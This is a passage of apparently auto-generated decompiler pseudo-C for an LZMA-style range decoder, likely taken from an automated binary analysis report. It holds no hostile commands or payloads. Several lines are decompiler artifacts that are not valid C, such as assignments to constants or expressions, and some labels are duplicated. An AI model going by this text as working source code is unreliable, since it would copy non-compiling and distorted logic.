						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
